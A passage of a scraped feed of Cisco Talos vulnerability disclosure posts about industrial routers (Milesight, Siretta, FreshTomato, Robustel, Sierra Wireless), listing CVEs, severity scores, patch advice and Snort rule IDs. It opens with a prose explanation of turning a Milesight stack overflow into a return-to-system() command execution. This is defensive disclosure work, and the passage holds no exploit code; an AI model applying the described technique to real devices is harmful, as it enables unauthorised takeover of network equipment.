returning to the caller, is `strncpy`. The r0 register is used for passing the first argument of a function; in the case of `strncpy`, r0 points to the destination buffer. After the `strncpy` call, r0 will therefore point to the beginning of the plaintext password.\n\nThe combination of a stack buffer overflow, a binary with no stack canary, a non-PIE binary that uses the `system` function, and control over the content that r0 points to makes exploitation straightforward. 
An attacker could overwrite the return address so that the function returns into the `system` function, and control the executed shell command by placing the command to execute at the beginning of the plaintext password payload, as shown in the gdb screenshot below.\n\n\n\nHere `pc` is at the last instruction of the `decrypt_string` function, the return address has been overwritten with the `system` PLT entry, whose address is known because the binary is not PIE, and the `r0` register points to the `controllable` string. So, when `decrypt_string` returns, it will execute `system(\"controllable\")`.\n\n## Vulnerability Details\n\nThe following vulnerabilities are command injection issues in Milesight UR32L. These vulnerabilities exist in different functionalities of the router. An attacker could exploit these vulnerabilities by sending a specially crafted network packet to a targeted device:\n\n * [TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>) (CVE-2023-23550)\n * [TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>) (CVE-2023-22306)\n * [TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>) (CVE-2023-22659)\n * [TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>) (CVE-2023-24519 - CVE-2023-24520)\n * [TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>) (CVE-2023-24582 - CVE-2023-24583)\n * [TALOS-2023-1711](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1711>) (CVE-2023-22365)\n * [TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>) (CVE-2023-22299)\n * [TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>) (CVE-2023-24595)\n * [TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>) (CVE-2023-22653)\n * 
[TALOS-2023-1723](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1723>) (CVE-2023-25582 - CVE-2023-25583)\n\nThere are also several vulnerabilities in the UR32L that could lead to a buffer overflow. An attacker could trigger these vulnerabilities by sending a specially crafted HTTP request or network request to the targeted device, depending on the specific vulnerability.\n\n * [TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>) (CVE-2023-23902)\n * [TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>) (CVE-2023-24018)\n * [TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>) (CVE-2023-25081 - CVE-2023-25124)\n * [TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>) (CVE-2023-24019)\n\n[TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>) (CVE-2023-23546) is a misconfiguration vulnerability in the Milesight UR32L that could lead to an attacker obtaining increased privileges on the device. The adversary, in this case, would need to carry out a man-in-the-middle attack to exploit this vulnerability.\n\nThere is also an access violation vulnerability -- [TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>) (CVE-2023-23571) -- that could lead to a denial-of-service if the attacker sends the device a specially crafted network request. 
[TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>) (CVE-2023-23547) can also be exploited with a specially crafted network request, but in this case, can lead to arbitrary file read.\n\nTalos also discovered five vulnerabilities in the MilesightVPN:\n\n * [TALOS-2023-1700](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1700>) (CVE-2023-22844): Authentication bypass vulnerability\n * [TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>) (CVE-2023-22319): SQL injection vulnerability\n * [TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>) (CVE-2023-23907): Directory traversal vulnerability\n * [TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>) (CVE-2023-22371): Command injection vulnerability\n * [TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>) (CVE-2023-24496 - CVE-2023-24497): Cross-site scripting vulnerability\n\n## Coverage\n\nThe following Snort rules will detect exploitation attempts against these vulnerabilities: 61206 - 61208, 61212, 61255 - 61258, 61266 - 61269, 61395 - 61397. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. 
For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T15:38:19", "type": "talosblog", "title": "Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"], "modified": "2023-07-06T15:38:19", "id": "TALOSBLOG:BB780E8AC252593B415F668CD7BEBD82", "href": "https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-02T20:12:34", "description": 
"\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. 
[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). 
An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.\n\nThe Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. 
The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps.\n\nTalos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. All these vulnerabilities have a CVSS severity score of 9.1 out of 10:\n\n * [TALOS-2022-1578](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1578>) (CVE-2022-34850)\n * [TALOS-2022-1577](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1577>) (CVE-2022-33150)\n * [TALOS-2022-1576](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1576>) (CVE-2022-32765)\n * [TALOS-2022-1573](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1573>) (CVE-2022-33325 - CVE-2022-33329)\n * [TALOS-2022-1572](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1572>) (CVE-2022-33312 - CVE-2022-33314)\n\n[TALOS-2022-1580](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1580>) (CVE-2022-34845) and [TALOS-2022-1570](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1570>) (CVE-2022-32585) can also lead to arbitrary code execution, though this vulnerability exists when a user logs in as an administrator.\n\nAn attacker could also send a specially crafted network request to trigger [TALOS-2022-1575](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1575>) (CVE-2022-35261 - CVE-2022-35271), a denial-of-service vulnerability in the device's web server hashFirst functionality that could allow an adversary to crash the web server.\n\nAnother vulnerability, [TALOS-2022-1571](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1571>) (CVE-2022-28127) also exists in the web server on the device, but instead could be exploited to remove arbitrary files, even though a path traversal check is in place.\n\nCisco Talos worked with 
Robustel to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Robustel R1510, version 3.3.0 and 3.1.16. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60007 - 60035, 60388-60391, 60393 and 60455. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T19:33:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-28127", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271"], "modified": "2022-10-12T19:33:00", "id": "TALOSBLOG:5249F941D38D1066B30BDEFF9C2C9F1B", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-multiple-issues-in-robustel-r1510-cellular-router-could-lead-to-code-execution-denial-of-service/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-12T20:01:15", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw._\n\nCisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.\n\nThe Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps.\n\nTalos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. 
All these vulnerabilities have a CVSS severity score of 9.1 out of 10: \n\n * [TALOS-2022-1578](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1578>) (CVE-2022-34850) \n * [TALOS-2022-1577](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1577>) (CVE-2022-33150) \n * [TALOS-2022-1576](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1576>) (CVE-2022-32765) \n * [TALOS-2022-1573](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1573>) (CVE-2022-33325 - CVE-2022-33329) \n * [TALOS-2022-1572](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1572>) (CVE-2022-33312 - CVE-2022-33314) \n\n[TALOS-2022-1580](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1580>) (CVE-2022-34845) and [TALOS-2022-1570](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1570>) (CVE-2022-32585) can also lead to arbitrary code execution, though this vulnerability exists when a user logs in as an administrator. \n\nAn attacker could also send a specially crafted network request to trigger [TALOS-2022-1575](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1575>) (CVE-2022-35261 - CVE-2022-35271), a denial-of-service vulnerability in the device\u2019s web server hashFirst functionality that could allow an adversary to crash the web server. \n\nAnother vulnerability, [TALOS-2022-1571](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1571>) (CVE-2022-28127) also exists in the web server on the device, but instead could be exploited to remove arbitrary files, even though a path traversal check is in place. \n\nCisco Talos worked with Robustel to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco\u2019s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>). 
\n\nUsers are encouraged to update these affected products as soon as possible: Robustel R1510, version 3.3.0 and 3.1.16. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60007 - 60035, 60388-60391, 60393 and 60455. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T19:33:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28127", "CVE-2022-32585", "CVE-2022-32765", "CVE-2022-33150", "CVE-2022-33312", "CVE-2022-33314", "CVE-2022-33325", "CVE-2022-33329", "CVE-2022-34845", "CVE-2022-34850", "CVE-2022-35261", "CVE-2022-35271"], "modified": "2022-10-12T19:33:07", "id": "TALOSBLOG:29DAF5785414A83AEFB51D866CCCA165", "href": "http://blog.talosintelligence.com/2022/10/vuln-spotlight-robustel-router.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-09T10:20:19", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073"], "description": "_Carl Hurd and Jared Rittle of Cisco Talos discovered these vulnerabilities._ \n\n\n### Executive summary\n\nSeveral exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems. These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator\u2019s password and expose user credentials, among other scenarios. The majority of these vulnerabilities exist in ACEManager, the web server included with the ES450. ACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos worked with Sierra Wireless to ensure that these issues are resolved and that an update is available for affected customers. 
\n \n\n\n### Vulnerability details\n\n**Sierra Wireless AirLink ES450 ACEManager iplogging.cgi command injection vulnerability (TALOS-2018-0746/CVE-2018-4061)** \n \nAn exploitable command injection vulnerability exists in the ACEManager iplogging.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can inject arbitrary commands, resulting in arbitrary command execution. An attacker can send an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0746>). \n \n**Sierra Wireless AirLink ES450 SNMPD hard-coded credentials vulnerability (TALOS-2018-0747/CVE-2018-4062)** \n \nA hard-coded credentials vulnerability exists in the SNMPD function of the Sierra Wireless AirLink ES450 FW 4.9.3. Activating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user. An attacker can activate SNMPD without any configuration changes to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0747>). \n \n**Sierra Wireless AirLink ES450 ACEManager upload.cgi remote code execution vulnerability (TALOS-2018-0748/CVE-2018-4063)** \n \nAn exploitable remote code execution vulnerability exists in the upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the web server. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0748>). 
\n \n**Sierra Wireless AirLink ES450 ACEManager upload.cgi unverified password change vulnerability (TALOS-2018-0749/CVE-2018-4064)** \n \nAn exploitable unverified password change vulnerability exists in the ACEManager upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an unverified device configuration change, resulting in an unverified change of the `user` password on the device. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0749>). \n \n**Sierra Wireless AirLink ES450 ACEManager ping_result.cgi cross-site scripting vulnerability (TALOS-2018-0750/CVE-2018-4065)** \n \nAn exploitable cross-site scripting vulnerability exists in the ACEManager ping_result.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP ping request can cause reflected JavaScript to be executed and run on the victim's browser. An attacker can exploit this by convincing a victim to click a link or embedded URL that redirects to the reflected cross-site scripting vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0750>). \n \n**Sierra Wireless AirLink ES450 ACEManager cross-site request forgery vulnerability (TALOS-2018-0751/CVE-2018-4066)** \n \nAn exploitable cross-site request forgery vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an authenticated user to perform privileged requests unknowingly, resulting in unauthenticated requests being requested through an authenticated user. Triggering this vulnerability may allow an attacker to get authenticated pages via an authenticated user. 
\n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0751>). \n \n**Sierra Wireless AirLink ES450 ACEManager template_load.cgi information disclosure vulnerability (TALOS-2018-0752/CVE-2018-4067)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager template_load.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information leak, resulting in the disclosure of internal paths and files. An attacker can make an authenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0752>). \n \n**Sierra Wireless AirLink ES450 ACEManager information disclosure vulnerability (TALOS-2018-0753/CVE-2018-4068)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. An HTTP request can result in the disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0753>). \n \n**Sierra Wireless AirLink ES450 ACEManager information exposure vulnerability (TALOS-2018-0754/CVE-2018-4069)** \n \nAn information disclosure vulnerability exists in the ACEManager authentication functionality of Sierra Wireless AirLink ES450 FW 4.9.3. The ACEManager authentication functionality is done in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device to capitalize on this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0754>). 
\n \n**Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi information disclosure vulnerability (TALOS-2018-0755/CVE-2018-4070, CVE-2018-4071)** \n \nAn exploitable information disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause information disclosure, resulting in the exposure of confidential information, including, but not limited to, plain text passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0755>). \n \n**Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi permission assignment vulnerability (TALOS-2018-0756/CVE-2018-4072, CVE-2018-4073)** \n \nAn exploitable permission assignment vulnerability exists in the ACEManager Embedded_Ace_Set_Task.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an arbitrary setting to be written, resulting in unverified changes to any system setting. An attacker can make an authenticated HTTP request, or run the binary as any user, to trigger this vulnerability. \n \nFor more information on this vulnerability, read the complete advisory [here](<http://www.talosintelligence.com/reports/TALOS-2018-0756>). \n \n\n\n### Versions tested\n\nTalos tested and confirmed that the Sierra Wireless AirLink ES450 FW 4.9.3 is affected by these vulnerabilities. 
\n\n\n### Devices affected\n\nSierra Wireless has confirmed that multiple devices are affected by various subsets of these vulnerabilities including: \n\n\n * GX400\n * ES/GX440\n * LS300\n * ES/GX450\n * MP70\n * RV50/50X\n * LX40/60X\n \nMore thorough information about untested devices can be found through the [Sierra Wireless advisories](<https://www.sierrawireless.com/company/security/>). \n\n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: [48600](<https://snort.org/advisories/666>), [48635, 48614 - 48621](<https://snort.org/advisories/667>), [48747](<https://snort.org/advisories/671>) \n", "modified": "2019-04-25T11:06:20", "published": "2019-04-25T11:06:20", "id": "TALOSBLOG:D359C8798DB4F71E8813CE20072A5C76", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8-yvP7K6d3Y/vulnerability-sierra-airlink.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple vulnerabilities in Sierra Wireless AirLink ES450", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-11-16T08:07:12", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in InHand Networks' InRouter302 that could allow an attacker to access the router's console and make changes to the router's settings, including security protocols. 
